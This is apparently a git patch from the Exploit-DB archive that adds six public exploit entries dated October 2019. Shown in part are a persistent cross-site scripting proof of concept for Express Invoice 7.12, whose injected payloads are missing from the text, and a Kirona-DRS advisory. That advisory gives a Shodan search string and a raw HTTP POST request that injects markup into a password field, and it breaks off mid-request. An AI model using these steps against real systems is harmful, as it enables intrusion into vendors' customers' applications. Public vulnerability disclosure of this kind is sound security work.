From 7c5ad20e7230f9f13a859aa0b0622ede8badddc5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 15 Oct 2019 05:01:47 +0000 Subject: [PATCH] DB: 2019-10-15 6 changes to exploits/shellcodes SpotAuditor 5.3.1.0 - Denial of Service ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service Uplay 92.0.0.6280 - Local Privilege Escalation Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting Ajenti 2.1.31 - Remote Code Execution Kirona-DRS 5.5.3.5 - Information Disclosure --- exploits/php/webapps/47496.txt | 62 ++++++ exploits/php/webapps/47498.txt | 329 +++++++++++++++++++++++++++++++ exploits/python/webapps/47497.py | 115 +++++++++++ exploits/windows/dos/47494.py | 32 +++ exploits/windows/dos/47495.py | 31 +++ exploits/windows/local/47493.txt | 43 ++++ files_exploits.csv | 6 + 7 files changed, 618 insertions(+) create mode 100644 exploits/php/webapps/47496.txt create mode 100644 exploits/php/webapps/47498.txt create mode 100755 exploits/python/webapps/47497.py create mode 100755 exploits/windows/dos/47494.py create mode 100755 exploits/windows/dos/47495.py create mode 100644 exploits/windows/local/47493.txt diff --git a/exploits/php/webapps/47496.txt b/exploits/php/webapps/47496.txt new file mode 100644 index 000000000..ea140408b --- /dev/null +++ b/exploits/php/webapps/47496.txt @@ -0,0 +1,62 @@ +# Exploit Title: Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting +# Exploit Author: Debashis Pal +# Date: 2019-10-13 +# Vendor Homepage: https://www.nchsoftware.com/ +# Source: https://www.nchsoftware.com/invoice/index.html +# Version: Express Invoice v7.12 +# CVE : N/A +# Tested on: Windows 7 SP1(32bit) + +# About Express Invoice v7.12 +============================== +Express Invoice lets you create invoices you can print, email or fax directly to clients for faster payment. + +# Vulnerability +================ +Persistent Cross site scripting (XSS). + +# PoC +====== + +1. Login as authenticated unprivileged user to Express Invoice version 7.12 web enable service i.e http://A.B.C.D:96 [Default installation]. + +2. Under "Invoices" Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put + +Save the change. + +or + +Under "Items" +Items -> Add new item-> Item field: put + +Save the change. + +or + +Under "Customers" +Customers -> Add New Customer -> Customer Name: put + +Save the change. + +or + +Under "Quotes" +Quotes -> View Quotes -> Add New Quote -> Customer: put + +Save the change. + +3. Login in authenticated privileged or unprivileged user to Express Invoice v7.12 web enable service and visit any of Invoices/Items/Customers/Quotes section, Persistent XSS payload will execute. + + +# Disclosure Timeline +====================== +Vulnerability Discover Date: 12-Sep-2019. +Vulnerability notification to vendor via vendor provided web form: 12-Sep-2019 ,13-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds. +Submit exploit-db : 14-Oct-2019. + + +# Disclaimer +============= +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. +The author prohibits any malicious use of security related information or exploits by the author or elsewhere. \ No newline at end of file diff --git a/exploits/php/webapps/47498.txt b/exploits/php/webapps/47498.txt new file mode 100644 index 000000000..0110ed369 --- /dev/null +++ b/exploits/php/webapps/47498.txt @@ -0,0 +1,329 @@ +# Exploit Title: Kirona-DRS 5.5.3.5 - Information Disclosure +# Discovered Date: 2019-10-03 +# Shodan Search: /opt-portal/pages/login.xhtml +# Exploit Author: Ramikan +# Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/ +# Affected Version: DRS 5.5.3.5 may be other versions. +# Tested On Version: DRS 5.5.3.5 on PHP/5.6.14 +# Vendor Fix: Unknown +# CVE: CVE-2019-17503,CVE-2019-17504 +# Category: Web Apps +# Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities + +# Description: +# The application is vulnerable to the HTML injection, reflected cross site scripting and sensitive data disclosure. + +# Vulnerabiity 1:HTML injection and (CVE-2019-17504) +# An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected Cross-site scripting (XSS) +# vulnerability allows remote attackers to inject arbitrary web script via the /osm/report/ 'password' parameter. + +Affected URL: /osm/report/ + +Affected Parameter: password + + +POST Request: + +POST /osm/report/ HTTP/1.1 +Host: 10.50.3.148 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 147 +Connection: close +Referer: https://10.50.3.148/osm/report/ +Upgrade-Insecure-Requests: 1 + +create=true&password=&login=admin&password='<" ><

HTML Injection-heading tag used